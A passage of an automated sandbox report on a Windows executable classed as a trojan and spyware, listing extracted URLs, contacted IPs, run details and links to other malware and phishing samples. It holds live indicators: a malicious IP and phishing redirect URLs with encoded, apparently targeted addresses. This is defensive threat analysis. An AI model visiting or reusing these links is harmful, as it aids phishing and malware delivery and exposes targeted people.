https://docs.google.com/spreadsheets/	chrome.exe, 00000009.00000003.1515971121.0000610C01B38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516474004.0000610C01B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515480883.0000610C01B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516039773.0000610C01B4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516160661.0000610C01B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515294312.0000610C01B08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515851887.0000610C01B24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516574713.0000610C01B7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515627709.0000610C01B1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515777473.0000610C01B20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://gemini-staging.corp.google.com	chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://play.google.com/log?format=json&hasfast=true	chrome.exe, 00000012.00000000.1626351423.0000174400120000.00000004.00000001.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/2J	chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.newtonsoft.com/jsonschema	BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1390912360.00000000063A0000.00000004.08000000.00040000.00000008.sdmp	false	high
https://chromewebstore.google.com/	chrome.exe, 0000000B.00000002.1469099908.000030080004C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1487187700.00000F380004C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1577458301.00004FC80004C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1623521160.000017400004C000.00000004.00000001.00020000.00000000.sdmp	false	high
https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access	chrome.exe, 00000012.00000000.1636144276.0000174400B89000.00000004.00000001.00020000.00000000.sdmp	false	high
https://drive-preprod.corp.google.com/	chrome.exe, 00000009.00000003.1747339596.0000610C0217C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/download	chrome.exe, 00000009.00000003.1519936534.0000610C019C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1519750662.0000610C01A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1519407283.0000610C003CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516917913.0000610C01B9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515480883.0000610C01B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517146415.0000610C01BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516039773.0000610C01B4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517304811.0000610C01BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1488517237.0000610C003CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517260747.0000610C01BC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516160661.0000610C01B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515294312.0000610C01B08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515851887.0000610C01B24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517069798.0000610C01BAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517399389.0000610C01BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516574713.0000610C01B7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515627709.0000610C01B1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516864377.0000610C01B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515777473.0000610C01B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516971151.0000610C01BA4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.google.com/gemini?p=chrome_PHb	chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://lens.goo	chrome.exe, 0000000C.00000000.1498335070.00000F3C00C24000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.google.com/	chrome.exe, 00000012.00000000.1627142529.00001744001E9000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1629956275.0000174400484000.00000004.00000001.00020000.00000000.sdmp	false	high
https://docs.google.com/document/	chrome.exe, 00000009.00000003.1515971121.0000610C01B38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516745409.0000610C01B84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516474004.0000610C01B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517021522.0000610C01BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516917913.0000610C01B9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515480883.0000610C01B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517146415.0000610C01BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516039773.0000610C01B4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517304811.0000610C01BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517260747.0000610C01BC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516160661.0000610C01B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515294312.0000610C01B08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515851887.0000610C01B24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517069798.0000610C01BAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517399389.0000610C01BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516574713.0000610C01B7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515627709.0000610C01B1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516864377.0000610C01B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515777473.0000610C01B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516971151.0000610C01BA4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://clients6.google.com	chrome.exe, 00000012.00000000.1629715817.0000174400479000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1621084438.000001E3002C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635542748.000017440095C000.00000004.00000001.00020000.00000000.sdmp	false	high
http://google.com/	chrome.exe, 0000000C.00000000.1488602278.00000F3C00069000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1616596865.00004FCC00538000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587584119.00004FCC00538000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631009401.0000174400529000.00000004.00000001.00020000.00000000.sdmp	false	high
https://csp.withgoogle.com/csp/report-to/static-on-bigtable	chrome.exe, 00000012.00000000.1634264652.0000174400788000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/Terms	chrome.exe, 00000009.00000003.1747558171.0000610C0116C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://use.typekit.net	chrome.exe, 00000009.00000003.1518703844.0000610C0104C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1488517237.0000610C003D4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/mgravell/protobuf-netJ	BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1392192788.0000000006BD0000.00000004.08000000.00040000.00000008.sdmp	false	high
https://csp.withgoogle.com/csp/report-to/st	chrome.exe, 00000012.00000000.1626051186.00001744000D9000.00000004.00000001.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en-GB	chrome.exe, 0000000C.00000000.1484936243.0000022000028000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1496966561.00000F3C00878000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1483735552.0000021E00040000.00000004.00000001.00020000.00000000.sdmp	false	high
https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1U	chrome.exe, 00000012.00000000.1621084438.000001E3002C0000.00000004.00000001.00020000.00000000.sdmp	false	high
https://gemini-autopush.corp.google.com	chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000009.00000003.1642845988.0000610C011CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1457336781.0000610C01220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1519649114.0000610C011CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1518621188.0000610C01220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1449759585.0000610C011CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1489839768.00000F3C001E4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1615261179.00004FCC00470000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1581009164.00004FCC001E4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1583663875.00004FCC00470000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1627142529.00001744001E9000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1627142529.00001744001E4000.00000004.00000001.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.ico	chrome.exe, 00000009.00000003.1747558171.0000610C0116C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://lens.google.com/gen204	chrome.exe, 00000009.00000003.1486603570.0000610C004A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1486703514.0000610C01498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1497950032.00000F3C00AC8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1497385618.00000F3C00934000.00000004.00000001.00020000.00000000.sdmp	false	high
https://ogs.google.com/widget/app/so?eom=1&awwd=1&origin=chrome-untrusted%3A%2F%2Fnew-tab-page&origi	chrome.exe, 00000012.00000000.1627312655.0000174400214000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	chrome.exe, 00000009.00000003.1457409309.0000610C00458000.00000004.00000800.00020000.00000000.sdmp	false	high
https://domains.google.com/suggest/flowU	chrome.exe, 00000012.00000000.1621084438.000001E3002C0000.00000004.00000001.00020000.00000000.sdmp	false	high
https://myactivity.google.com/	chrome.exe, 0000000C.00000000.1483842298.0000021E00100000.00000004.00000001.00020000.00000000.sdmp	false	high
http://fontfabrik.com	chrome.exe, 0000000C.00000000.1482607974.00000214F5822000.00000004.00000001.00020000.00000000.sdmp	false	high
https://drive-staging.corp.google.com/	chrome.exe, 00000009.00000003.1747339596.0000610C0217C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/mgravell/protobuf-neti	BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1392192788.0000000006BD0000.00000004.08000000.00040000.00000008.sdmp	false	high
https://mail.google.com/mail/?tab=rm&ogbl	chrome.exe, 00000009.00000003.1487099247.0000610C018F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/imghp?hl=en-GB&tab=ri&ogbl	chrome.exe, 00000009.00000003.1487099247.0000610C018F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/11564914/23354;	BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1392192788.0000000006BD0000.00000004.08000000.00040000.00000008.sdmp	false	high
https://drafts.csswg.org/css-color-adjust-1/#forced-colors-properties	chrome.exe, 0000000C.00000000.1499280638.00000F3C00CED000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1633724909.0000174400728000.00000004.00000001.00020000.00000000.sdmp	false	high
https://csp.withgoogle.com/csp/social-frontend-mpm-access	chrome.exe, 00000012.00000000.1636144276.0000174400B89000.00000004.00000001.00020000.00000000.sdmp	false	high
https://gemini-preprod.corp.google.com	chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://policies.google.com/	chrome.exe, 0000000C.00000000.1483842298.0000021E00100000.00000004.00000001.00020000.00000000.sdmp	false	high
https://fonts.google.com/icons?selected=Material	chrome.exe, 00000009.00000003.1452884697.0000610C01610000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1457813036.0000610C0168C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1452564381.0000610C01664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1491631084.00000F3C00350000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1489839768.00000F3C001E4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1490776894.00000F3C002C5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1492578775.00000F3C0046E000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1484137038.0000021E002C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1497483537.00000F3C00A04000.00000004.00000001.00020000.00000000.sdmp	false	high
https://gemini.google.com/glic2c	chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/Ge	chrome.exe, 00000012.00000003.1849210701.000001E300040000.00000004.00000001.00020000.00000000.sdmp	false	high
https://apis.google.com	chrome.exe, 00000009.00000003.1487099247.0000610C018F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1458108971.0000610C01604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003E8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1629715817.0000174400479000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635404636.0000174400920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1620592610.000001E300100000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003EE000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635542748.000017440095C000.00000004.00000001.00020000.00000000.sdmp	false	high
https://apis.google.comU	chrome.exe, 00000012.00000000.1620592610.000001E300100000.00000004.00000001.00020000.00000000.sdmp	false	high
https://csp.withgoogle.com/csp/one-google-eng	chrome.exe, 00000012.00000000.1626126561.00001744000F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628047168.0000174400318000.00000004.00000001.00020000.00000000.sdmp	false	high
https://plus.google.comU	chrome.exe, 00000012.00000000.1621084438.000001E3002C0000.00000004.00000001.00020000.00000000.sdmp	false	high
https://domains.google.com/suggest/flow	chrome.exe, 00000012.00000000.1629715817.0000174400479000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1621084438.000001E3002C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635542748.000017440095C000.00000004.00000001.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://lens.google.com/uploadU	chrome.exe, 0000000C.00000003.1842325989.0000021E004C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1843750524.0000021E004C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1484137038.0000021E004C0000.00000004.00000001.00020000.00000000.sdmp	false	high
https://lens.google.com/uploadbyurlU	chrome.exe, 0000000C.00000003.1842325989.0000021E004C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1843750524.0000021E004C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1484137038.0000021E004C0000.00000004.00000001.00020000.00000000.sdmp	false	high
https://ogs.google.com	chrome.exe, 00000012.00000000.1625354440.0000174400069000.00000004.00000001.00020000.00000000.sdmp	false	high
https://ogs.google.com/widget/app/so?eom=1	chrome.exe, 00000009.00000003.1487099247.0000610C018F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1458108971.0000610C01604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003E8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003EE000.00000004.00000001.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.92.120.101	unknown	Cyprus	197328	INETLTDTR	true
142.250.80.100	www.google.com	United States	15169	GOOGLEUS	false
142.251.40.225	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
142.250.80.78	plus.l.google.com	United States	15169	GOOGLEUS	false
185.15.121.100	www.vastkupan.com	Sweden	61207	ILAITSE	false

Private

IP
192.168.2.6

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1718460
Start date and time:	2025-06-19 12:57:36 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	9
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BSN100357-HHGBM100002525.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@57/1@11/6
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 90% Number of executed functions: 345 Number of non-executed functions: 42
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 142.250.80.14, 142.251.40.227, 142.250.176.206, 142.251.16.84, 142.250.65.195, 142.250.80.110, 142.250.65.174, 142.251.40.238, 142.251.32.106, 142.251.40.202, 142.251.40.234, 142.250.65.234, 142.250.64.106, 142.250.65.202, 172.217.165.138, 142.250.65.170, 142.250.80.106, 142.250.72.106, 142.250.176.202, 142.250.80.74, 142.250.80.10, 142.250.81.234, 142.251.41.10, 142.250.80.42, 142.251.40.138, 142.251.40.170, 142.250.64.74, 142.251.35.170, 142.251.40.106, 142.251.40.174, 142.251.41.14, 104.102.118.126
Excluded domains from analysis (whitelisted): chromewebstore.googleapis.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, www.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, redirector.gvt1.com, clients.l.google.com, www.gstatic.com, c.pki.goog, optimizationguide-pa.googleapis.com
Execution Graph export aborted for target chrome.exe, PID 1560 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:58:32	API Interceptor	24x Sleep call for process: BSN100357-HHGBM100002525.exe modified
06:58:48	API Interceptor	48x Sleep call for process: InstallUtil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
91.92.120.101	nEnq-0023HHHDDJKSS1000025.pif.exe	Get hash	malicious	Unknown	Browse
185.15.121.100	SKR14000521000025-HHND1400653.exe	Get hash	malicious	MSIL Logger, MassLogger RAT, ResolverRAT	Browse
	https://api.record-data.cashya.com/product/v1/domains/cashalo/applications/CRM/recordData?campaignId=0bdf7530-7c70-11ef-ba8f-d732ea237024&content=footer%20google%20play%20download%20button&function=redirect&groupId=10798&jobId=ecadb6a0-7d5e-11ef-ba8f-d732ea237024&segmentId=6162&service=CRM&taskId=f9dd8380-7c70-11ef-ba8f-d732ea237024&templateId=d4822820-4598-11ef-aa28-754ff3546467&trackingType=click&type=edm&url=https://sjogren.concil.nu/#c2hlbmEudGltYmVybGFrZSR0ZXhhbmFjZW50ZXIuY29t	Get hash	malicious	HTMLPhisher	Browse
	https://api.record-data.cashya.com/product/v1/domains/cashalo/applications/CRM/recordData?campaignId=0bdf7530-7c70-11ef-ba8f-d732ea237024&content=footer%20google%20play%20download%20button&function=redirect&groupId=10798&jobId=ecadb6a0-7d5e-11ef-ba8f-d732ea237024&segmentId=6162&service=CRM&taskId=f9dd8380-7c70-11ef-ba8f-d732ea237024&templateId=d4822820-4598-11ef-aa28-754ff3546467&trackingType=click&type=edm&url=https://starflow.hu/#am1hcmNvdmljaSRwZ3BhdGVudC5jb20=	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse
	https://ads.revjet.com/click/tag333513/8225263328112768506/1?vid=5149144914569151414&__ads=4fa41f0d57cec80d98c50af8a5067930&adkey=f97&hx=218639464&agrp=eg64362&agrpKey=831&slot=tag333513&impts=1738285728695&ad=crv230822&crvKey=d37&_cx=$$CX$$&_cy=$$CY$$&_celt=$$ELT-ID$$&_celtid=$$ELT-IDS$$&lp=https://starflow.hu/#dHJlbnQkbGF0c2hhd2RyaWxsaW5nLmNvbQ==	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse
	https://tracking.worden.com/visit/12351968/?url=https://kasentorp.se/#dGlmZmFueS5lZHdhcmRzJGptY28uY29t	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ogads-pa.clients6.google.com	https://ach-lindid-zznwebmail-j4q0ot7zh-links-mail-version.vercel.app/?P9K2V4JXQ=XJ2K5N9PVLcGF0YXRhc2ZyaXRhc0Bnb29nbGUuY29tXJ2K5N9PVL&mode=retrievalXJ2K5N9PVL	Get hash	malicious	Unknown	Browse	142.250.72.106
	index.exe	Get hash	malicious	Amadey, Deer Stealer, LummaC Stealer, Quasar	Browse	142.251.40.170
	DocuFlex.exe	Get hash	malicious	Unknown	Browse	142.251.41.10
	DocuFlex.exe	Get hash	malicious	Unknown	Browse	142.251.41.10
	LUZMSTEB.exe	Get hash	malicious	Vidar	Browse	142.251.40.106
	Xeno.exe	Get hash	malicious	Phemedrone Stealer	Browse	142.250.65.170
	ws.exe	Get hash	malicious	Vidar	Browse	142.250.80.42
	http://frequencemedicale.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	142.250.80.10
	http://fountainofhealth.ca	Get hash	malicious	Unknown	Browse	142.251.40.138
	https://silverboxx.com/main/redirect.php?red='https://panelcore.on-lis.com	Get hash	malicious	Unknown	Browse	142.250.81.234
www.vastkupan.com	SKR14000521000025-HHND1400653.exe	Get hash	malicious	MSIL Logger, MassLogger RAT, ResolverRAT	Browse	185.15.121.100

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INETLTDTR	s390x.elf	Get hash	malicious	Unknown	Browse	89.22.226.106
	ppc64.elf	Get hash	malicious	Unknown	Browse	89.22.226.106
	amd64.elf	Get hash	malicious	Unknown	Browse	89.22.226.106
	ppc64le.elf	Get hash	malicious	Unknown	Browse	89.22.226.106
	arm926t.elf	Get hash	malicious	Unknown	Browse	89.22.226.106
	arm926t.elf	Get hash	malicious	Unknown	Browse	89.22.226.106
	awb_dhl_awb_bl_inv_06_17_2025_doc_0615202520257820020031808174CN180030106152025.7z.bat	Get hash	malicious	XWorm	Browse	185.167.61.11
	HYDUN - Boiler sheets and Mould Order 0625.vbe	Get hash	malicious	Unknown	Browse	91.92.120.116
	Quotation_006_Electrical_Cables_Wires.vbe	Get hash	malicious	Unknown	Browse	91.92.120.108
	ppc64.elf	Get hash	malicious	Unknown	Browse	89.22.226.106
ILAITSE	SKR14000521000025-HHND1400653.exe	Get hash	malicious	MSIL Logger, MassLogger RAT, ResolverRAT	Browse	185.15.121.100
	SecuriteInfo.com.ELF.Dropper-AH.31168.27766.elf	Get hash	malicious	Unknown	Browse	185.248.85.11
	resgod.m68k.elf	Get hash	malicious	Mirai	Browse	80.73.54.126
	https://api.record-data.cashya.com/product/v1/domains/cashalo/applications/CRM/recordData?campaignId=0bdf7530-7c70-11ef-ba8f-d732ea237024&content=footer%20google%20play%20download%20button&function=redirect&groupId=10798&jobId=ecadb6a0-7d5e-11ef-ba8f-d732ea237024&segmentId=6162&service=CRM&taskId=f9dd8380-7c70-11ef-ba8f-d732ea237024&templateId=d4822820-4598-11ef-aa28-754ff3546467&trackingType=click&type=edm&url=https://sjogren.concil.nu/#c2hlbmEudGltYmVybGFrZSR0ZXhhbmFjZW50ZXIuY29t	Get hash	malicious	HTMLPhisher	Browse	185.15.121.100
	https://api.record-data.cashya.com/product/v1/domains/cashalo/applications/CRM/recordData?campaignId=0bdf7530-7c70-11ef-ba8f-d732ea237024&content=footer%20google%20play%20download%20button&function=redirect&groupId=10798&jobId=ecadb6a0-7d5e-11ef-ba8f-d732ea237024&segmentId=6162&service=CRM&taskId=f9dd8380-7c70-11ef-ba8f-d732ea237024&templateId=d4822820-4598-11ef-aa28-754ff3546467&trackingType=click&type=edm&url=https://starflow.hu/#am1hcmNvdmljaSRwZ3BhdGVudC5jb20=	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	185.15.121.100
	https://ads.revjet.com/click/tag333513/8225263328112768506/1?vid=5149144914569151414&__ads=4fa41f0d57cec80d98c50af8a5067930&adkey=f97&hx=218639464&agrp=eg64362&agrpKey=831&slot=tag333513&impts=1738285728695&ad=crv230822&crvKey=d37&_cx=$$CX$$&_cy=$$CY$$&_celt=$$ELT-ID$$&_celtid=$$ELT-IDS$$&lp=https://starflow.hu/#dHJlbnQkbGF0c2hhd2RyaWxsaW5nLmNvbQ==	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	185.15.121.100
	https://tracking.worden.com/visit/12351968/?url=https://kasentorp.se/#dGlmZmFueS5lZHdhcmRzJGptY28uY29t	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	185.15.121.100
	kkkx86.elf	Get hash	malicious	Unknown	Browse	80.73.56.189
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	94.246.125.234
	Fzfee1Lgc2.elf	Get hash	malicious	Unknown	Browse	185.15.122.22

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://www.google.co.ve/url?q=https%3A%2F%2Fdismatelguatemala.com%2Fjj%2F&sa=D&sntz=1&usg=AOvVaw39jTinBG4YQ4YPs-ZxjEBI#?2463743Family=YnJpZGdldC5tYXJyQHRoZWljZWNvLmNvLnVr	Get hash	malicious	Tycoon2FA	Browse	172.202.163.200
